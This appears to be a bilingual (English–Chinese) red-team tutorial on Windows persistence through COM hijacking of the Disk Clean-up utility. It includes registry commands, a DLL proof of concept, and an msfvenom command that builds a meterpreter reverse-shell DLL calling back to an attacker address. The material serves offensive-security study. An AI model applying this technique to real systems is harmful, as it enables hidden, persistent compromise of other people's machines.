Disk Clean-up is a utility which is part of Windows operating systems and can free up hard drive disk space by deleting mainly cache and temporary files to improve system performance. The utility was introduced in Windows 98 operating systems and even though it has been deprecated and replaced with a modern version in the settings application, Microsoft has not removed it and has kept it as a legacy tool.
磁盘清理是Windows操作系统的一部分,可以通过删除缓存和临时文件来释放硬盘驱动器磁盘空间,以提高系统性能。该实用程序是在Windows 98操作系统中引入的,尽管它已被弃用并在设置应用程序中替换为现代版本,但Microsoft并未将其删除,并将其保留为旧工具。
From the perspective of Red Teaming it is feasible to utilize the disk clean-up utility to establish persistence by executing arbitrary code when the utility is initiated. Specifically, this method relies on COM Hijacking since the cleanmgr.exe which is the utility which initiates the Disk Clean-up will examine the Windows registry for a number of DLL’s. Therefore, hijacking one the CLSID’s which is associated with the Disk Clean-up will result in code execution.
从红队的角度来看,利用磁盘清理实用程序在启动该实用程序时通过执行任意代码来建立持久性是可行的。具体来说,此方法依赖于 COM 劫持,因为启动磁盘清理的实用程序 cleanmgr.exe 将检查 Windows 注册表中的许多 DLL。因此,劫持与磁盘清理关联的 CLSID 将导致代码执行。
The Files to delete functionality is retrieved from the registry and it is not static. If elevation of privileges has been achieved, then it is possible to create registry entries that will cause the cleanmgr.exe utility execute an arbitrary DLL. The following registry keys are associated with the functionality of Disk Clean-up:
“要删除的文件”功能是从注册表中检索的,它不是静态的。如果已实现特权提升,则可以创建注册表项,这些注册表项将导致 cleanmgr.exe 实用工具执行任意 DLL。以下注册表项与磁盘清理功能相关联:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\<registry-key-CLSID>
HKCU\Software\Classes\CLSID\{arbitrary-CLSID}
Execution of the following command will enumerate the registry keys which are correlated with the Files to delete functionality:
执行以下命令将枚举与要删除功能的文件相关的注册表项:
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches" /s
From the registry keys listed, the Downloaded Program Files is associated with the {8369AB20-56C9-11D0-94E8-00AA0059CE02} CLSID.
从列出的注册表项中,下载的程序文件与 {8369AB20-56C9-11D0-94E8-00AA0059CE02} CLSID 相关联。
Also, this indicated the presence of this CLSID under the following registry key:
此外,这还指示以下注册表项下存在此 CLSID:
reg query "HKEY_CLASSES_ROOT\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s
The following code can be used as a proof of concept to display a message box when the disk clean-up utility is initiated.
以下代码可用作概念证明,以便在启动磁盘清理实用程序时显示消息框。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
#include "pch.h" #include "windows.h" #include "WinUser.h" BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: MessageBox(NULL, ( LPCWSTR ) L"Visit pentestlab.blog" ,( LPCWSTR ) L"pentestlab" , MB_OK); break ; case DLL_THREAD_ATTACH: break ; case DLL_THREAD_DETACH: break ; case DLL_PROCESS_DETACH: break ; } return TRUE; } |
The CLSID which is going to be hijacked needs to be created under the following registry key and the subkey of InprocServer32 under the hijacked CLSID which needs to target the path of the arbitrary DLL.
需要在以下注册表项下创建将被劫持的 CLSID,并在被劫持的 CLSID 下创建 InprocServer32 的子项,该 CLSID 需要以任意 DLL 的路径为目标。
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID
Execution of the command below can enumerate the hijacked CLSID in order to verify that it points to the arbitrary DLL.
执行以下命令可以枚举被劫持的 CLSID,以验证它是否指向任意 DLL。
reg query "HKCU\Software\Classes\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s
Running the cleanmgr.exe will execute the code. It should be noted that usage of the parameter /autoclean will not display to the user the graphical user interface of the Disk Clean-up. Furthermore, it could be combined with other functionality of Windows such as registry run keys or scheduled tasks to execute this binary during start-up or at a specific time interval.
运行 cleanmgr.exe 将执行代码。应该注意的是,参数 /autoclean 的使用不会向用户显示磁盘清理的图形用户界面。此外,它可以与 Windows 的其他功能(如注册表运行键或计划任务)结合使用,以在启动期间或以特定时间间隔执行此二进制文件。
cleanmgr.exe
cleanmgr.exe /autoclean
cleanmgr.exe /setup
cleanmgr.exe /cleanup
Metasploit Framework utility msfvenom can be used to generated a DLL automatically. Even though this is not a safe method and could lead to a detection during a red team exercise it is used only for the purposes of the article.
Metasploit Framework 实用程序 msfvenom 可用于自动生成 DLL。尽管这不是一种安全的方法,并且可能导致在红队演习期间被发现,但它仅用于本文的目的。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.3 LPORT=4444 -f dll -o pentestlab.dll
As previously the DLL needs to be written on the disk and the registry key must be modified to target the new path.
与以前一样,需要将 DLL 写入磁盘,并且必须修改注册表项以面向新路径。
Once the disk clean-up is started the code will be executed and a meterpreter session will established with the compromised host.
磁盘清理开始后,将执行代码,并与受感染的主机建立 meterpreter 会话。
References 引用
- https://cocomelonc.github.io/persistence/2022/11/16/malware-pers-19.html
- https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/
原文始发于pentestlab:Persistence – Disk Clean-up